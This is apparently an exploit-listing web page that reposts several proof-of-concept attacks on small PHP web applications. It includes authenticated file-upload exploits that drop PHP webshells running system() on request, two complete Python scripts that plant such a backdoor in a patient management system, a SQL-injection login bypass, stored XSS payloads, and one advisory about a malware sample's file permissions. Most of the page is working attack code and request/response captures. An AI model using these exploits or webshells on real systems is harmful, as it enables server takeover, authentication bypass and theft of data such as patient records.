Latest exploits :: CodePwn

<pre><code># Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-02-08 # Exploit Author: Juli Agarwal(@agarwaljuli) # Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code # Version: 1.0 # Tested on: XAMPP, Kali Linux Description – The application suffers from a remote code execution in the admin panel. An authenticated attacker can upload a web-shell php file in profile page to achieve remote code execution. POC:- ========== # Request: ========== POST /erms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------37791356766765055891341961306 Content-Length: 1004 Origin: http://localhost Connection: close Referer: http://localhost/erms/admin/?page=user Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="id" 1 -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="lastname" Admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="username" admin -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="password" -----------------------------37791356766765055891341961306 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php <html> <body> Remote code execution: <pre> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> </pre> </body> </html> -----------------------------37791356766765055891341961306— ================ # Webshell access: ================ # Webshell access via: POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id # Webshell response: Remote code execution: uid=1(daemon) gid=1(daemon) groups=1(daemon) </code></pre>

<pre><code># Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated) # Date: 03/12/2021 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ # Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download # Version: 2.0.2 # Tested on: Ubuntu import requests import os import argparse def login(session , target , username , password): print("[+] Attempting to login with the credential") url = target + "/index.php/login/valid_signin" login_data = {"username" : username , "password" : password} session.post(url , data=login_data , verify=False) return session def generate_plugin(): print("[+] Generating a malicious plugin") global tmp_dir tmp_dir = os.popen("mktemp -d").read().rstrip() open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>") os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read() def upload_plugin(session , target): print("[+] Uploading the plugin into the server.") url = target + "/index.php/module/upload_module/" file = open(f"{tmp_dir}/rce.zip" , "rb").read() session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)}) session.get(target + "/index.php/module/activate_module/rce" , verify=False) print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php") print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}") def main(): parser = argparse.ArgumentParser(""" __ _ __ _ __ _____/ /_ (_) /__(_) /__________ _ / ___/ __ \/ / //_/ / __/ ___/ __ `/ / /__/ / / / / ,< / / /_(__ ) /_/ / \___/_/ /_/_/_/|_/_/\__/____/\__,_/ Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution : POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter) req_args = parser.add_argument_group('required arguments') req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa") req_args.add_argument("-u" , "--username" , help="Username" , required=True) req_args.add_argument("-p" , "--password" , help="password", required=True) args = parser.parse_args() target = args.URL if target[-1] == "/": target = target[:-1] username = args.username password = args.password session = requests.session() login(session , target , username , password) generate_plugin() upload_plugin(session , target) if __name__ == "__main__": main() </code></pre>

<pre><code># Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) # Date: 03/12/2021 # Exploit Author: 0z09e (https://twitter.com/0z09e) # Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ # Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download # Version: 2.0.2 # Tested on: Ubuntu import requests import os from zipfile import ZipFile import argparse def login(session , target , username , password): print("[+] Attempting to login with the credential") url = target + "/index.php/login/valid_signin" login_data = {"username" : username , "password" : password} session.post(url , data=login_data , verify=False) return session def download_backup( session , target): print("[+] Downloading the backup (This may take some time)") url = target + "/index.php/settings/take_backup/" backup_req = session.get(url , verify=False) global tmp_dir tmp_dir = os.popen("mktemp -d").read().rstrip() open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content) print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip") def modify_backup(): print("[+] Modifying the backup by injecting a backdoor.") zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r') zf.extractall(tmp_dir) zf.close() open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>") os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read() def upload_backup(session , target): print("[+] Uploading the backup back into the server.(This may take some time)") url = target + "/index.php/settings/restore_backup" file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read() session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)}) print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php") print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}") def main(): parser = argparse.ArgumentParser(""" __ _ __ _ __ _____/ /_ (_) /__(_) /__________ _ / ___/ __ \/ / //_/ / __/ ___/ __ `/ / /__/ / / / / ,< / / /_(__ ) /_/ / \___/_/ /_/_/_/|_/_/\__/____/\__,_/ Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution : POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter) req_args = parser.add_argument_group('required arguments') req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa") req_args.add_argument("-u" , "--username" , help="Username" , required=True) req_args.add_argument("-p" , "--password" , help="password", required=True) args = parser.parse_args() target = args.URL if target[-1] == "/": target = target[:-1] username = args.username password = args.password session = requests.session() login(session ,target , username , password) download_backup(session , target ) modify_backup() upload_backup(session , target) if __name__ == "__main__": main() </code></pre>

<pre><code># Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: Actions.php # VUlnerable parameters: "username" Technical description: An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - 123'+or+1=1+--+- --- POST /Actions.php?a=employee_login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 43 Origin: http://edtms.com Connection: close Referer: http://edtms.com/login.php Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl email=admin'+or+1=1+--+-&password=123123213 response HTTP/1.1 200 OK Date: Wed, 10 Nov 2021 02:23:38 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/8.0.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48 {"status":"success","msg":"Login successfully."} --- </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/16fab35b51f9e6447f2a8c04db4ebe93.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Frauder.jt Vulnerability: Insecure Permissions Description: The malware writes an extensionless PE file named "x" with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Type: PE32 MD5: 16fab35b51f9e6447f2a8c04db4ebe93 Vuln ID: MVID-2022-0481 Dropped files: x Disclosure: 02/08/2022 Exploit/PoC: C:\>cacls x C:\x BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir x Volume in drive C has no label. Directory of C:\ 02/09/2013 01:43 PM 25,088 x 1 File(s) 25,088 bytes 0 Dir(s) 27,505,713,152 bytes free C:\>type x MZÉ !This program cannot be run in DOS mode. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS) # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: ?page=view_task&id=2 Technical description: A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. xss-1: 1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task" 2) Insert your payload in the "title" and "Task Description" parameter parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(123)> --- POST /Actions.php?a=save_task HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 312 Origin: http://localhost Connection: close Referer: http://localhost/?page=tasks Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E xss-2 1) Navigate to http://localhost.com/?page=manage_account 2) Insert your payload in the "full name" or "contact" or "email" parameter parameter Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(123)> -- POST /Actions.php?a=update_credentials_employee HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384 Content-Length: 1613 Origin: http://localhost Connection: close Referer: http://localhost/?page=manage_account Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="id" 1 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="fullname" John D Smith -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="gender" Male -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="dob" 1997-06-23 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="contact" 098123456789"><img src=# onerror=alert(123)> -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="email" jsmith@sample.com -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="address" Sample Address -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="department_id" 1 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="email" jsmith@sample.com -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="password" -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="old_password" -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream -----------------------------27882107026209045483167935384-- </code></pre>

<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 9/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Request sent as base user POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215 Content-Length: 769 Origin: http://localhost Connection: close Referer: http://localhost/hocms/admin/?page=system_info Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="name" Home Owners Collection Management System' -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="short_name" HOCMS - PHP -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------31935477191495174627236953215 Content-Disposition: form-data; name="cover"; filename="cmd.php" Content-Type: application/x-php <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------31935477191495174627236953215-- # Response HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:32:16 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju Upgrade-Insecure-Requests: 1 # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:39:06 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Access-Control-Allow-Origin: * Content-Length: 33 Connection: close Content-Type: text/html; charset=UTF-8 0xSaudi </pre> </body> </html> </code></pre>